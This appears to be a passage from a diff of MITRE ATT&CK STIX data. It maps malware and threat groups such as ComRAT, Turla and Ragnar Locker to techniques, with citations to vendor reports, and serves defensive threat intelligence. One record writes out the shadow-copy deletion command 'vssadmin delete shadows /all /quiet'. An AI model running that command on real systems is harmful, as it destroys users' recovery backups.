+ "url": "https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf",
+ "description": "Faou, M. (2020, May). From Agent.btz to ComRAT v4: A ten-year journey. Retrieved June 15, 2020."
+ }
+ ],
+ "description": "[Turla](https://attack.mitre.org/groups/G0010) has used fsutil fsinfo drives to list connected drives.(Citation: ESET ComRAT May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--7dd2714d-aa8a-40ce-bae1-98634090ac01",
+ "type": "relationship",
+ "modified": "2020-06-29T03:33:39.040Z",
+ "created": "2020-06-29T03:33:39.040Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--da5880b4-f7da-4869-85f2-e0aba84b8565",
+ "target_ref": "attack-pattern--d1fcf083-a721-4223-aedf-bf8960798d62",
+ "external_references": [
+ {
+ "source_name": "ESET ComRAT May 2020",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf",
+ "description": "Faou, M. (2020, May). From Agent.btz to ComRAT v4: A ten-year journey. Retrieved June 15, 2020."
+ }
+ ],
+ "description": "[ComRAT](https://attack.mitre.org/software/S0126) has used cmd.exe to execute commands.(Citation: ESET ComRAT May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--9800fd7a-d2e1-4188-a991-7b8e09edaa13",
+ "type": "relationship",
+ "modified": "2020-06-29T03:41:07.256Z",
+ "created": "2020-06-29T03:41:07.256Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--da5880b4-f7da-4869-85f2-e0aba84b8565",
+ "target_ref": "attack-pattern--970a3432-3237-47ad-bcca-7d8cbb217736",
+ "external_references": [
+ {
+ "source_name": "ESET ComRAT May 2020",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf",
+ "description": "Faou, M. (2020, May). From Agent.btz to ComRAT v4: A ten-year journey. Retrieved June 15, 2020."
+ }
+ ],
+ "description": "[ComRAT](https://attack.mitre.org/software/S0126) has used PowerShell to load itself every time a user logs in to the system. [ComRAT](https://attack.mitre.org/software/S0126) can execute PowerShell scripts loaded into memory or from the file system.(Citation: ESET ComRAT May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--bdac1391-310e-4511-b272-b80924166723",
+ "type": "relationship",
+ "modified": "2020-06-29T04:05:19.178Z",
+ "created": "2020-06-29T03:41:07.285Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--da5880b4-f7da-4869-85f2-e0aba84b8565",
+ "target_ref": "attack-pattern--be055942-6e63-49d7-9fa1-9cb7d8a8f3f4",
+ "external_references": [
+ {
+ "source_name": "ESET ComRAT May 2020",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf",
+ "description": "Faou, M. (2020, May). From Agent.btz to ComRAT v4: A ten-year journey. Retrieved June 15, 2020."
+ }
+ ],
+ "description": "[ComRAT](https://attack.mitre.org/software/S0126) has the ability to use the Gmail web UI to receive commands and exfiltrate information.(Citation: ESET ComRAT May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--6ff34c78-2c85-4be5-b3db-0ec8543087d9",
+ "type": "relationship",
+ "modified": "2020-06-29T04:05:19.176Z",
+ "created": "2020-06-29T03:41:07.302Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--da5880b4-f7da-4869-85f2-e0aba84b8565",
+ "target_ref": "attack-pattern--391d824f-0ef1-47a0-b0ee-c59a75e27670",
+ "external_references": [
+ {
+ "source_name": "ESET ComRAT May 2020",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf",
+ "description": "Faou, M. (2020, May). From Agent.btz to ComRAT v4: A ten-year journey. Retrieved June 15, 2020."
+ }
+ ],
+ "description": "[ComRAT](https://attack.mitre.org/software/S0126) can load a PE file from memory or the file system and execute it with CreateProcessW.(Citation: ESET ComRAT May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--7eaf474f-7755-41d7-96c6-811889457be2",
+ "type": "relationship",
+ "modified": "2020-06-29T04:05:19.072Z",
+ "created": "2020-06-29T04:05:19.072Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--da5880b4-f7da-4869-85f2-e0aba84b8565",
+ "target_ref": "attack-pattern--bf176076-b789-408e-8cba-7275e81c0ada",
+ "external_references": [
+ {
+ "source_name": "ESET ComRAT May 2020",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf",
+ "description": "Faou, M. (2020, May). From Agent.btz to ComRAT v4: A ten-year journey. Retrieved June 15, 2020."
+ }
+ ],
+ "description": "[ComRAT](https://attack.mitre.org/software/S0126) can use SSL/TLS encryption for its HTTP-based C2 channel. [ComRAT](https://attack.mitre.org/software/S0126) has used public key cryptography with RSA and AES encrypted email attachments for its Gmail C2 channel.(Citation: ESET ComRAT May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--217ad0a6-f693-416e-9ae4-bcc0c533ce9f",
+ "type": "relationship",
+ "modified": "2020-06-30T22:03:27.124Z",
+ "created": "2020-06-29T04:05:19.098Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--c13d9621-aca7-436b-ab3d-3a95badb3d00",
+ "target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1",
+ "external_references": [
+ {
+ "source_name": "Unit 42 BackConfig May 2020",
+ "url": "https://unit42.paloaltonetworks.com/updated-backconfig-malware-targeting-government-and-military-organizations/",
+ "description": "Hinchliffe, A. and Falcone, R. (2020, May 11). Updated BackConfig Malware Targeting Government and Military Organizations in South Asia. Retrieved June 17, 2020."
+ }
+ ],
+ "description": "[BackConfig](https://attack.mitre.org/software/S0475) has the ability to gather the victim's computer name.(Citation: Unit 42 BackConfig May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--8763c8dd-cd68-4402-be43-4dbd96c83c2d",
+ "type": "relationship",
+ "modified": "2020-06-29T15:17:53.832Z",
+ "created": "2020-06-29T15:17:53.832Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "attack-pattern--b5327dd1-6bf9-4785-a199-25bcbd1f4a9d",
+ "target_ref": "attack-pattern--22905430-4901-4c2a-84f6-98243cb173f8",
+ "relationship_type": "subtechnique-of",
+ "id": "relationship--8b5b1096-80f7-43dd-a881-af92beac20f9",
+ "type": "relationship",
+ "modified": "2020-06-29T15:36:41.688Z",
+ "created": "2020-06-29T15:36:41.688Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--c13d9621-aca7-436b-ab3d-3a95badb3d00",
+ "target_ref": "attack-pattern--7bc57495-ea59-4380-be31-a64af124ef18",
+ "external_references": [
+ {
+ "source_name": "Unit 42 BackConfig May 2020",
+ "url": "https://unit42.paloaltonetworks.com/updated-backconfig-malware-targeting-government-and-military-organizations/",
+ "description": "Hinchliffe, A. and Falcone, R. (2020, May 11). Updated BackConfig Malware Targeting Government and Military Organizations in South Asia. Retrieved June 17, 2020."
+ }
+ ],
+ "description": "[BackConfig](https://attack.mitre.org/software/S0475) has the ability to identify folders and files related to previous infections.(Citation: Unit 42 BackConfig May 2020)\t",
+ "relationship_type": "uses",
+ "id": "relationship--2597e12c-c342-4ca0-a235-b05752b2bfa5",
+ "type": "relationship",
+ "modified": "2020-06-29T15:56:13.237Z",
+ "created": "2020-06-29T15:53:14.495Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "course-of-action--47e0e9fe-96ce-4f65-8bb1-8be1feacb5db",
+ "target_ref": "attack-pattern--b5327dd1-6bf9-4785-a199-25bcbd1f4a9d",
+ "relationship_type": "mitigates",
+ "description": "Use application control to mitigate installation and use of unapproved virtualization software.",
+ "id": "relationship--f9deebbf-5710-4e54-b4be-83404cee35da",
+ "type": "relationship",
+ "modified": "2020-07-06T19:03:40.425Z",
+ "created": "2020-06-29T22:23:14.216Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "course-of-action--eb88d97c-32f1-40be-80f0-d61a4b0b4b31",
+ "target_ref": "attack-pattern--b5327dd1-6bf9-4785-a199-25bcbd1f4a9d",
+ "relationship_type": "mitigates",
+ "description": "Disable Hyper-V if not necessary within a given environment.",
+ "id": "relationship--1ec28c41-586b-42dc-9400-6e6313e38d84",
+ "type": "relationship",
+ "modified": "2020-07-06T19:03:40.431Z",
+ "created": "2020-06-29T22:23:14.236Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--f99f3dcc-683f-4936-8791-075ac5e58f10",
+ "target_ref": "attack-pattern--b5327dd1-6bf9-4785-a199-25bcbd1f4a9d",
+ "external_references": [
+ {
+ "source_name": "ESET LoudMiner June 2019",
+ "url": "https://www.welivesecurity.com/2019/06/20/loudminer-mining-cracked-vst-software/",
+ "description": "Malik, M. (2019, June 20). LoudMiner: Cross-platform mining in cracked VST software. Retrieved May 18, 2020."
+ }
+ ],
+ "description": "[LoudMiner](https://attack.mitre.org/software/S0451) has used QEMU and VirtualBox to run a Tiny Core Linux virtual machine, which runs XMRig and makes connections to the C2 server for updates.(Citation: ESET LoudMiner June 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--9fc89cc1-ef57-461c-9324-0ebe43999c07",
+ "type": "relationship",
+ "modified": "2020-06-29T22:47:34.564Z",
+ "created": "2020-06-29T22:47:34.564Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--f99f3dcc-683f-4936-8791-075ac5e58f10",
+ "target_ref": "attack-pattern--2959d63f-73fd-46a1-abd2-109d7dcede32",
+ "external_references": [
+ {
+ "source_name": "ESET LoudMiner June 2019",
+ "url": "https://www.welivesecurity.com/2019/06/20/loudminer-mining-cracked-vst-software/",
+ "description": "Malik, M. (2019, June 20). LoudMiner: Cross-platform mining in cracked VST software. Retrieved May 18, 2020."
+ }
+ ],
+ "description": "[LoudMiner](https://attack.mitre.org/software/S0451) has used VboxVmService to run a Linux virtual machine as a service for persistence.(Citation: ESET LoudMiner June 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--80bead39-b050-48d9-b185-aa31d1681a61",
+ "type": "relationship",
+ "modified": "2020-06-29T23:17:50.379Z",
+ "created": "2020-06-29T23:17:50.379Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--54895630-efd2-4608-9c24-319de972a9eb",
+ "target_ref": "attack-pattern--365be77f-fc0e-42ee-bac8-4faf806d9336",
+ "external_references": [
+ {
+ "source_name": "Sophos Ragnar May 2020",
+ "url": "https://news.sophos.com/en-us/2020/05/21/ragnar-locker-ransomware-deploys-virtual-machine-to-dodge-security/",
+ "description": "SophosLabs. (2020, May 21). Ragnar Locker ransomware deploys virtual machine to dodge security. Retrieved June 29, 2020."
+ }
+ ],
+ "description": "[Ragnar Locker](https://attack.mitre.org/software/S0481) has been delivered as an unsigned MSI package that was executed with msiexec.exe.(Citation: Sophos Ragnar May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--bf5b23c2-9b65-4909-ae6c-21b8ccadd930",
+ "type": "relationship",
+ "modified": "2020-06-30T00:18:39.773Z",
+ "created": "2020-06-30T00:18:39.773Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--54895630-efd2-4608-9c24-319de972a9eb",
+ "target_ref": "attack-pattern--b80d107d-fa0d-4b60-9684-b0433e8bdba0",
+ "external_references": [
+ {
+ "source_name": "Sophos Ragnar May 2020",
+ "url": "https://news.sophos.com/en-us/2020/05/21/ragnar-locker-ransomware-deploys-virtual-machine-to-dodge-security/",
+ "description": "SophosLabs. (2020, May 21). Ragnar Locker ransomware deploys virtual machine to dodge security. Retrieved June 29, 2020."
+ },
+ {
+ "source_name": "Cynet Ragnar Apr 2020",
+ "url": "https://www.cynet.com/blog/cynet-detection-report-ragnar-locker-ransomware/",
+ "description": "Gold, B. (2020, April 27). Cynet Detection Report: Ragnar Locker Ransomware. Retrieved June 29, 2020."
+ }
+ ],
+ "description": "[Ragnar Locker](https://attack.mitre.org/software/S0481) encrypts files on the local machine and mapped drives prior to displaying a note demanding a ransom.(Citation: Sophos Ragnar May 2020)(Citation: Cynet Ragnar Apr 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--05951058-e8d4-4ace-a6b8-54735c6a4769",
+ "type": "relationship",
+ "modified": "2020-06-30T00:18:39.795Z",
+ "created": "2020-06-30T00:18:39.795Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--54895630-efd2-4608-9c24-319de972a9eb",
+ "target_ref": "attack-pattern--b5327dd1-6bf9-4785-a199-25bcbd1f4a9d",
+ "external_references": [
+ {
+ "source_name": "Sophos Ragnar May 2020",
+ "url": "https://news.sophos.com/en-us/2020/05/21/ragnar-locker-ransomware-deploys-virtual-machine-to-dodge-security/",
+ "description": "SophosLabs. (2020, May 21). Ragnar Locker ransomware deploys virtual machine to dodge security. Retrieved June 29, 2020."
+ }
+ ],
+ "description": "[Ragnar Locker](https://attack.mitre.org/software/S0481) has used VirtualBox and a stripped Windows XP virtual machine to run itself. The use of a shared folder specified in the configuration enables [Ragnar Locker](https://attack.mitre.org/software/S0481) to encrypt files on the host operating system, including files on any mapped drives.(Citation: Sophos Ragnar May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--913c67d5-0c5b-40d5-be88-6ce4e5030603",
+ "type": "relationship",
+ "modified": "2020-06-30T00:18:39.805Z",
+ "created": "2020-06-30T00:18:39.805Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--54895630-efd2-4608-9c24-319de972a9eb",
+ "target_ref": "attack-pattern--20fb2507-d71c-455d-9b6d-6104461cf26b",
+ "external_references": [
+ {
+ "source_name": "Sophos Ragnar May 2020",
+ "url": "https://news.sophos.com/en-us/2020/05/21/ragnar-locker-ransomware-deploys-virtual-machine-to-dodge-security/",
+ "description": "SophosLabs. (2020, May 21). Ragnar Locker ransomware deploys virtual machine to dodge security. Retrieved June 29, 2020."
+ }
+ ],
+ "description": "[Ragnar Locker](https://attack.mitre.org/software/S0481) has attempted to stop services associated with business applications and databases to release the lock on files used by these applications so they may be encrypted.(Citation: Sophos Ragnar May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--9212f940-021e-49b1-b500-fa1dd76b7132",
+ "type": "relationship",
+ "modified": "2020-06-30T00:39:39.847Z",
+ "created": "2020-06-30T00:39:39.847Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--54895630-efd2-4608-9c24-319de972a9eb",
+ "target_ref": "attack-pattern--ac08589e-ee59-4935-8667-d845e38fe579",
+ "external_references": [
+ {
+ "source_name": "Sophos Ragnar May 2020",
+ "url": "https://news.sophos.com/en-us/2020/05/21/ragnar-locker-ransomware-deploys-virtual-machine-to-dodge-security/",
+ "description": "SophosLabs. (2020, May 21). Ragnar Locker ransomware deploys virtual machine to dodge security. Retrieved June 29, 2020."
+ }
+ ],
+ "description": "[Ragnar Locker](https://attack.mitre.org/software/S0481) has attempted to terminate/stop processes and services associated with endpoint security products.(Citation: Sophos Ragnar May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--ca33387d-495a-460a-86da-d5f8d8adda31",
+ "type": "relationship",
+ "modified": "2020-06-30T00:39:39.881Z",
+ "created": "2020-06-30T00:39:39.881Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--54895630-efd2-4608-9c24-319de972a9eb",
+ "target_ref": "attack-pattern--348f1eef-964b-4eb6-bb53-69b3dcb0c643",
+ "external_references": [
+ {
+ "source_name": "Sophos Ragnar May 2020",
+ "url": "https://news.sophos.com/en-us/2020/05/21/ragnar-locker-ransomware-deploys-virtual-machine-to-dodge-security/",
+ "description": "SophosLabs. (2020, May 21). Ragnar Locker ransomware deploys virtual machine to dodge security. Retrieved June 29, 2020."
+ }
+ ],
+ "description": "[Ragnar Locker](https://attack.mitre.org/software/S0481) may attempt to connect to removable drives and mapped network drives.(Citation: Sophos Ragnar May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--ea79bf34-c1ba-4523-879f-441d6a4a9e5e",
+ "type": "relationship",
+ "modified": "2020-06-30T00:39:39.885Z",
+ "created": "2020-06-30T00:39:39.885Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--54895630-efd2-4608-9c24-319de972a9eb",
+ "target_ref": "attack-pattern--f5d8eed6-48a9-4cdf-a3d7-d1ffa99c3d2a",
+ "external_references": [
+ {
+ "source_name": "Sophos Ragnar May 2020",
+ "url": "https://news.sophos.com/en-us/2020/05/21/ragnar-locker-ransomware-deploys-virtual-machine-to-dodge-security/",
+ "description": "SophosLabs. (2020, May 21). Ragnar Locker ransomware deploys virtual machine to dodge security. Retrieved June 29, 2020."
+ }
+ ],
+ "description": "[Ragnar Locker](https://attack.mitre.org/software/S0481) can delete volume shadow copies using vssadmin delete shadows /all /quiet.(Citation: Sophos Ragnar May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--06dd311f-393f-4c24-beee-19d690ae4ba2",
+ "type": "relationship",
+ "modified": "2020-06-30T00:39:39.891Z",
+ "created": "2020-06-30T00:39:39.891Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--54895630-efd2-4608-9c24-319de972a9eb",
+ "target_ref": "attack-pattern--f1951e8a-500e-4a26-8803-76d95c4554b4",
+ "external_references": [
+ {
+ "source_name": "Sophos Ragnar May 2020",
+ "url": "https://news.sophos.com/en-us/2020/05/21/ragnar-locker-ransomware-deploys-virtual-machine-to-dodge-security/",
+ "description": "SophosLabs. (2020, May 21). Ragnar Locker ransomware deploys virtual machine to dodge security. Retrieved June 29, 2020."
+ }
+ ],
+ "description": "[Ragnar Locker](https://attack.mitre.org/software/S0481) has used sc.exe to execute a service that it creates.(Citation: Sophos Ragnar May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--347de212-26bf-4ad4-963f-c4dfa3c821d1",
+ "type": "relationship",
+ "modified": "2020-06-30T00:39:39.895Z",
+ "created": "2020-06-30T00:39:39.895Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--54895630-efd2-4608-9c24-319de972a9eb",
+ "target_ref": "attack-pattern--2959d63f-73fd-46a1-abd2-109d7dcede32",
+ "external_references": [
+ {
+ "source_name": "Sophos Ragnar May 2020",
+ "url": "https://news.sophos.com/en-us/2020/05/21/ragnar-locker-ransomware-deploys-virtual-machine-to-dodge-security/",
+ "description": "SophosLabs. (2020, May 21). Ragnar Locker ransomware deploys virtual machine to dodge security. Retrieved June 29, 2020."
+ }
+ ],
+ "description": "[Ragnar Locker](https://attack.mitre.org/software/S0481) has used sc.exe to create a new service for the VirtualBox driver.(Citation: Sophos Ragnar May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--b7573d56-3acb-464f-b63b-3734af37ad42",
+ "type": "relationship",
+ "modified": "2020-06-30T00:39:39.898Z",
+ "created": "2020-06-30T00:39:39.898Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--54895630-efd2-4608-9c24-319de972a9eb",
+ "target_ref": "attack-pattern--045d0922-2310-4e60-b5e4-3302302cb3c5",
+ "external_references": [
+ {
+ "source_name": "Sophos Ragnar May 2020",
+ "url": "https://news.sophos.com/en-us/2020/05/21/ragnar-locker-ransomware-deploys-virtual-machine-to-dodge-security/",
+ "description": "SophosLabs. (2020, May 21). Ragnar Locker ransomware deploys virtual machine to dodge security. Retrieved June 29, 2020."
+ }
+ ],
+ "description": "[Ragnar Locker](https://attack.mitre.org/software/S0481) has used rundll32.exe to execute components of VirtualBox.(Citation: Sophos Ragnar May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--e22af0ee-ab7a-4989-9077-fe538a3ad03d",
+ "type": "relationship",
+ "modified": "2020-06-30T00:39:39.941Z",
+ "created": "2020-06-30T00:39:39.941Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--54895630-efd2-4608-9c24-319de972a9eb",
+ "target_ref": "attack-pattern--d1fcf083-a721-4223-aedf-bf8960798d62",
+ "external_references": [
+ {
+ "source_name": "Sophos Ragnar May 2020",
+ "url": "https://news.sophos.com/en-us/2020/05/21/ragnar-locker-ransomware-deploys-virtual-machine-to-dodge-security/",
+ "description": "SophosLabs. (2020, May 21). Ragnar Locker ransomware deploys virtual machine to dodge security. Retrieved June 29, 2020."
+ }
+ ],
+ "description": "[Ragnar Locker](https://attack.mitre.org/software/S0481) has used cmd.exe and batch scripts to execute commands.(Citation: Sophos Ragnar May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--3a20bdab-0c73-49be-a8b5-630787814773",
+ "type": "relationship",
+ "modified": "2020-06-30T00:39:39.951Z",
+ "created": "2020-06-30T00:39:39.951Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--54895630-efd2-4608-9c24-319de972a9eb",
+ "target_ref": "attack-pattern--b97f1d35-4249-4486-a6b5-ee60ccf24fab",
+ "external_references": [
+ {
+ "source_name": "Sophos Ragnar May 2020",
+ "url": "https://news.sophos.com/en-us/2020/05/21/ragnar-locker-ransomware-deploys-virtual-machine-to-dodge-security/",
+ "description": "SophosLabs. (2020, May 21). Ragnar Locker ransomware deploys virtual machine to dodge security. Retrieved June 29, 2020."
+ }
+ ],
+ "description": "[Ragnar Locker](https://attack.mitre.org/software/S0481) has used regsvr32.exe to execute components of VirtualBox.(Citation: Sophos Ragnar May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--af1edc78-f0b2-450c-b91f-fe1646589173",
+ "type": "relationship",
+ "modified": "2020-06-30T00:39:39.953Z",
+ "created": "2020-06-30T00:39:39.953Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--da5880b4-f7da-4869-85f2-e0aba84b8565",
+ "target_ref": "attack-pattern--54b4c251-1f0e-4eba-ba6b-dbc7a6f6f06b",
+ "external_references": [
+ {
+ "source_name": "ESET ComRAT May 2020",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf",
+ "description": "Faou, M. (2020, May). From Agent.btz to ComRAT v4: A ten-year journey. Retrieved June 15, 2020."
+ }
+ ],
+ "description": "[ComRAT](https://attack.mitre.org/software/S0126) can use email attachments for command and control.(Citation: ESET ComRAT May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--0b2b0719-c82e-4d1f-b34c-7ed5dd5c8968",
+ "type": "relationship",
+ "modified": "2020-06-30T22:03:27.016Z",
+ "created": "2020-06-30T22:03:27.016Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--7a19ecb1-3c65-4de3-a230-993516aed6a6",
+ "target_ref": "attack-pattern--d28ef391-8ed4-45dc-bc4a-2f43abf54416",
+ "external_references": [
+ {
+ "source_name": "ESET ComRAT May 2020",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf",
+ "description": "Faou, M. (2020, May). From Agent.btz to ComRAT v4: A ten-year journey. Retrieved June 15, 2020."
+ }
+ ],
+ "description": "[Turla](https://attack.mitre.org/groups/G0010) has used a custom .NET tool to collect documents from an organization's internal central database.(Citation: ESET ComRAT May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--b3e2abaa-f431-4791-95d0-d44f3a74a73f",
+ "type": "relationship",
+ "modified": "2020-06-30T22:24:45.570Z",
+ "created": "2020-06-30T22:12:28.108Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--7a19ecb1-3c65-4de3-a230-993516aed6a6",
+ "target_ref": "attack-pattern--d742a578-d70e-4d0e-96a6-02a9c30204e6",
+ "external_references": [
+ {
+ "source_name": "ESET ComRAT May 2020",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf",
+ "description": "Faou, M. (2020, May). From Agent.btz to ComRAT v4: A ten-year journey. Retrieved June 15, 2020."
+ }
+ ],
+ "description": "[Turla](https://attack.mitre.org/groups/G0010) has infected victims using watering holes.(Citation: ESET ComRAT May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--5e8f23be-48b6-4236-9475-89f11e769ee6",
+ "type": "relationship",
+ "modified": "2020-06-30T22:12:28.116Z",
+ "created": "2020-06-30T22:12:28.116Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--da5880b4-f7da-4869-85f2-e0aba84b8565",
+ "target_ref": "attack-pattern--7bdca9d5-d500-4d7d-8c52-5fd47baf4c0c",
+ "external_references": [
+ {
+ "source_name": "ESET ComRAT May 2020",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf",
+ "description": "Faou, M. (2020, May). From Agent.btz to ComRAT v4: A ten-year journey. Retrieved June 15, 2020."
+ }
+ ],
+ "description": "[ComRAT](https://attack.mitre.org/software/S0126) has used a task name associated with Windows SQM Consolidator.(Citation: ESET ComRAT May 2020)",
+ "relationship_type": "uses",
